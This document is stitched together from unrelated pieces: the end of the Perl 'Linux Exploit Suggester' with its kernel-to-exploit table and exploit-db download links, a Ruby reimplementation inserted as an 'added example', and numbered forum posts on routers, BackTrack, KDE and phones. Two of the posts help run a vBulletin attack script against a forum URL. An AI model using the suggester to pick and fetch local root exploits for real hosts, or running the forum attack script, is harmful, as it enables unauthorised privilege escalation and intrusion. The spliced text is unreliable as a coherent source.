                '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20',
                '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
                '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36',
            ],
            cve => '2010-3437',
            mil => 'http://www.exploit-db.com/exploits/15150/',
        },
        'video4linux' => {
            vuln => [
                '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10',
                '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20',
                '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
                '2.6.31', '2.6.32', '2.6.33',
            ],
            cve => '2010-3081',
            mil => 'http://www.exploit-db.com/exploits/15024/',
        },
        'memodipper' => {
            vuln => [ '2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', '3.0.6', '3.1.0', ],
            cve => '2012-0056',
            mil => 'http://www.exploit-db.com/exploits/18411/',
        },
        'semtex' => {
            vuln => [ '2.6.37', '2.6.38', '2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', '3.0.6', '3.1.0', ],
            cve => '2013-2094',
            mil => 'http://www.exploit-db.com/download/25444/?',
        },
        'perf_swevent' => {
            vuln => [
                '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', '3.0.6', '3.1.0', '3.2', '3.3',
                '3.4.0', '3.4.1', '3.4.2', '3.4.3', '3.4.4', '3.4.5', '3.4.6', '3.4.8', '3.4.9', '3.5', '3.6', '3.7',
                '3.8.0', '3.8.1', '3.8.2', '3.8.3', '3.8.4', '3.8.5', '3.8.6', '3.8.7', '3.8.8', '3.8.9',
            ],
            cve => '2013-2094',
            mil => 'http://www.exploit-db.com/download/26131',
        },
        'msr' => {
            vuln => [
                '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.27',
                '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38', '2.6.39',
                '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', '3.0.6', '3.1.0', '3.2', '3.3', '3.4', '3.5', '3.6', '3.7.0', '3.7.6',
            ],
            cve => '2013-0268',
            mil => 'http://www.exploit-db.com/exploits/27297/',
        },
        'timeoutpwn' => {
            vuln => [
                '3.4', '3.5', '3.6', '3.7', '3.8', '3.8.9', '3.9', '3.10', '3.11', '3.12', '3.13',
                '3.4.0', '3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.5', '3.8.6', '3.8.9', '3.9.0', '3.9.6',
                '3.10.0', '3.10.6', '3.11.0', '3.12.0', '3.13.0', '3.13.1'
            ],
            cve => '2014-0038',
            mil => 'http://www.exploit-db.com/exploits/31346/',
        },
        'rawmodePTY' => {
            vuln => [ '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38', '2.6.39', '3.14', '3.15' ],
            cve => '2014-0196',
            mil => 'http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c',
        },
    );
}

__END__

=head1 NAME

Linux_Exploit_Suggester.pl - A local exploit suggester for linux

=head1 DESCRIPTION

This perl script will enumerate the possible exploits available for a given kernel version

=head1 USAGE

$ Local_Exploit_Checker [-h] [-k kernel]

  [-h] help
  [-k] kernel Eg. 2.6.28

You can also provide a partial kernel version (eg. 2.4)
to see all exploits available.

=head1 AUTHOR

Andy (c) 10-07-2009

Thanks to Brian for bugfixes, and sploit additions.

=head1 CHANGELOG

19-04-2014 added cve-2014-0196 and bug fixes (Andy)
05-09-2013 code cleanup/optimizations and partial kernel feature (garu)
28-08-2013 added msr driver (Andy)
12-06-2013 added perf_swevent (Andy)
23-01-2012 added memodipper (Andy)
14-11-2011 bug fix to cut kernel version, plus a few more sploits listed (Brian)

=cut

=head1 LICENSE

Linux Exploit Suggester

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

=cut

Linux_Exploit_Suggester

Linux Exploit Suggester; based on operating system release number.

This program run without arguments will perform a 'uname -r' to grab the Linux Operating Systems release version, and return a suggestive list of possible exploits. Nothing fancy, so a patched/back-ported patch may fool this script.

Additionally possible to provide '-k' flag to manually enter the Kernel Version/Operating System Release Version.

This script has been extremely useful on site and in exams. Now Open-sourced under GPLv2.

Sample Output

$ perl ./Linux_Exploit_Suggester.pl -k 3.0.0

Kernel local: 3.0.0

Possible Exploits:
[+] semtex
   CVE-2013-2094
   Source: www.exploit-db.com/download/25444/?
[+] memodipper
   CVE-2012-0056
   Source: http://www.exploit-db.com/exploits/18411/
[+] perf_swevent
   CVE-2013-2094
   Source: http://www.exploit-db.com/download/26131

$ perl ./Linux_Exploit_Suggester.pl -k 2.6.28

Kernel local: 2.6.28

Possible Exploits:
[+] sock_sendpage2
   Alt: proto_ops    CVE-2009-2692
   Source: http://www.exploit-db.com/exploits/9436
[+] half_nelson3
   Alt: econet    CVE-2010-4073
   Source: http://www.exploit-db.com/exploits/17787/
[+] reiserfs
   CVE-2010-1146
   Source: http://www.exploit-db.com/exploits/12130/
[+] pktcdvd
   CVE-2010-3437
   Source: http://www.exploit-db.com/exploits/15150/
[+] american-sign-language
   CVE-2010-4347
   Source: http://www.securityfocus.com/bid/45408/
[+] half_nelson
   Alt: econet    CVE-2010-3848
   Source: http://www.exploit-db.com/exploits/6851
[+] udev
   Alt: udev <1.4.1    CVE-2009-1185
   Source: http://www.exploit-db.com/exploits/8478
[+] do_pages_move
   Alt: sieve    CVE-2010-0415
   Source: Spenders Enlightenment
[+] pipe.c_32bit
   CVE-2009-3547
   Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c
[+] exit_notify
   Source: http://www.exploit-db.com/exploits/8369
[+] can_bcm
   CVE-2010-2959
   Source: http://www.exploit-db.com/exploits/14814/
[+] ptrace_kmod2
   Alt: ia32syscall,robert_you_suck    CVE-2010-3301
   Source: http://www.exploit-db.com/exploits/15023/
[+] half_nelson1
   Alt: econet    CVE-2010-3848
   Source: http://www.exploit-db.com/exploits/17787/
[+] half_nelson2
   Alt: econet    CVE-2010-3850
   Source: http://www.exploit-db.com/exploits/17787/
[+] sock_sendpage
   Alt: wunderbar_emporium    CVE-2009-2692
   Source: http://www.exploit-db.com/exploits/9435
[+] video4linux
   CVE-2010-3081
   Source: http://www.exploit-db.com/exploits/15024/
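The suggester above matches the `uname -r` string against an enumerated list of point releases, and its README is explicit that a distribution kernel carrying a backported fix will still be flagged. The block below is an added example, not part of Linux_Exploit_Suggester: it does the same lookup with version ranges, accepts a partial version such as "3.0" as a wildcard over the whole series, and keeps the distro suffix so the operator is reminded to check for backports. The four table entries are copied from the script's own table; expressing each one as a contiguous from..to range is this example's assumption.

```ruby
# Added example, not from Linux_Exploit_Suggester: range-based kernel matching.
# Entries copied from the script's table; the from/to bounds are an assumption.
EXPLOIT_RANGES = [
  { name: 'semtex',       cve: '2013-2094', from: [2, 6, 37], to: [3, 1, 0],
    src: 'http://www.exploit-db.com/download/25444/?' },
  { name: 'memodipper',   cve: '2012-0056', from: [2, 6, 39], to: [3, 1, 0],
    src: 'http://www.exploit-db.com/exploits/18411/' },
  { name: 'perf_swevent', cve: '2013-2094', from: [3, 0, 0],  to: [3, 8, 9],
    src: 'http://www.exploit-db.com/download/26131' },
  { name: 'timeoutpwn',   cve: '2014-0038', from: [3, 4, 0],  to: [3, 13, 1],
    src: 'http://www.exploit-db.com/exploits/31346/' },
]

# Parse `uname -r` output such as "3.13.0-24-generic". Returns [major, minor,
# patch] (patch is nil for a partial version like "2.6") and the distro suffix
# after the first '-', which is where a backported fix would hide behind an
# old-looking upstream number.
def parse_release(release)
  m = release.match(/\A(\d+)\.(\d+)(?:\.(\d+))?[.\d]*(-.*)?\z/)
  raise ArgumentError, "not a kernel release: #{release.inspect}" unless m
  patch = m[3] && m[3].to_i
  [[m[1].to_i, m[2].to_i, patch], m[4] || ""]
end

# A query without a patch level covers every patch level in that series.
def query_bounds(ver)
  maj, min, patch = ver
  patch ? [ver, ver] : [[maj, min, 0], [maj, min, Float::INFINITY]]
end

def overlaps?(lo, hi, entry)
  (entry[:from] <=> hi) <= 0 && (entry[:to] <=> lo) >= 0
end

def suggest(release, table = EXPLOIT_RANGES)
  ver, suffix = parse_release(release)
  lo, hi = query_bounds(ver)
  hits = table.select { |e| overlaps?(lo, hi, e) }
  { version: ver, distro_suffix: suffix, backport_warning: !suffix.empty?,
    exploits: hits.map { |e| e[:name] },
    sources: hits.map { |e| "#{e[:name]} CVE-#{e[:cve]} #{e[:src]}" } }
end

if __FILE__ == $0
  r = suggest(ARGV[0] || `uname -r`.strip)
  puts "Kernel local: #{r[:version].compact.join('.')}#{r[:distro_suffix]}"
  puts "Distro kernel: check the vendor changelog for backported fixes" if r[:backport_warning]
  r[:sources].each { |s| puts "[+] #{s}" }
end
```

Run as `ruby suggest.rb 3.13.0-24-generic` or with no argument to use the local `uname -r`. Matching on the upstream version number is still only a hint: the warning line is there because the same number on a distribution kernel can already carry the fix.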
  16. I didn't expect it, but it seems they took the advisory into account, fixed it and released a fix.

TRENDnet | Support | TEW-634GRU | N300 Wireless Gigabit Router w/ USB Port

  - Hardware: V1.0R
    Firmware: 1.01B14
    Date: 05/2014
    Notes:
      - Addressed security issue with TFTP access
      - Removed "User" account feature for added security
  17. @PoorStudentPleaseDonate it's the most common one. Thanks anyway!
  18. As it says there, BackTrack can no longer be downloaded (from the official site) because it is old and they have dropped it. Kali is the new version. If you still insist on installing BackTrack, here are a few mirrors: > BackTrack > BackTrack 5 R3 - LQ ISO
  19. Wireless communication technologies are becoming so fast that cable-based LAN is starting to be left behind. It will soon reach the point where 10 GbE technologies will have to replace Gigabit Ethernet in order to avoid total awkwardness. Admittedly, it has already started, but the number of motherboards with 10 GbE is very small still, and it's not like there are many NAS devices and servers that offer the capability either. Because of that, many high-end dual-band wireless routers probably can't work to their full potential. Even if they have a total performance of 1,900 Mbps, they can't really use it all except for inter-device connections. If you have, say, 20 people trying to access the Internet from their PCs or phones at the same time, the data speed will be limited to what your cable can dish out. ASUS has decided to go ahead and release a truly ludicrously overpowered Wi-Fi router anyway: the RT-AC87, the first to boast Wave 2 features. Wave 2 Wi-Fi features provide better reliability, overall performance improvements and speed boosts in certain situations, for the 802.11ac generation of WiFi routers. Looking at the RT-AC87, we can definitely say that those claims have substance. We may have seen the 2.4 GHz band being pushed to 600 Mbps before (though rarely), but the 5 GHz did not come in 1.73 Gbps previously, even with the use of BeamForming (and yes, ASUS uses it, for maximized range and signal strength). This all boils down to a total data throughput of up to 2.33 Gbps, give or take a dozen Mbps. A very high performance indeed, with quite an advantage over the previous so-called record of 1.9 Gbps. It is quite surprising, in a way, that ASUS managed to be the first to take a slice of the Wave 2 pie. We would have expected Netgear, D-Link or even Belkin to open the doors, so to speak, considering that they actually focus on networking hardware, wireless or otherwise. 
Of course, they are bound to launch their own products soon, perhaps this very week. And they might not even have to worry about competing with ASUS, since the latter's RT-AC87 will only be available in North America at launch. Speaking of which, sales should start within a few days, for the price of $270 / €200. The other companies will probably hover around the same price point, or whatever the equivalent is in Europe, Australia and Asia. Source: http://news.softpedia.com/news/ASUS-Launches-The-Fastest-Wi-FI-Router-Ever-At-2-33-Gbps-451718.shtml
  20. Stop trying it on other vBulletin versions and it will work. The script searches for a specific text, and that text is not present on all versions.

while(strpos($result, 'No Users Matched Your Query') == false)
  21. You have to run it from the console.

php script.php http://site.com/forum
  22. I've seen that Xenforo is quite well regarded. It was made by a few former vBulletin developers.
  23. "KDE proudly announces the immediate availability of Plasma 5.0, providing a visually updated core desktop experience that is easy to use and familiar to the user. Plasma 5.0 introduces a new major version of KDE's workspace offering. The new Breeze artwork concept introduces cleaner visuals and improved readability. Central work-flows have been streamlined, while well-known overarching interaction patterns are left intact. Plasma 5.0 improves support for high-DPI displays and ships a converged shell, able to switch between user experiences for different target devices. Changes under the hood include the migration to a new, fully hardware-accelerated graphics stack centered around an OpenGL(ES) scenegraph. Plasma is built using Qt 5 and Frameworks 5." Source: KDE Releases Plasma 5 - Slashdot
  24. It is not hard to assemble for someone who works in this field and has the necessary tools. On the software side it will be even harder if the components vary (are you going to write drivers?). Given that you asked this question, you are not in the category of people who have a chance of building it. As for the price of a phone, it is normal for the sale price not to match the price of the components. Besides the components, other things cost money too: shipping, labour, marketing/promotion, the operating system, support, taxes and many others.
  25. The phone looks good, the specs are decent and the OS seems to run well on them. Still, it is possible that not all Android applications are fully functional, and the community is also quite small at the moment. Personally I wouldn't venture to buy it; I would take it for a test drive first (although that doesn't look feasible at all).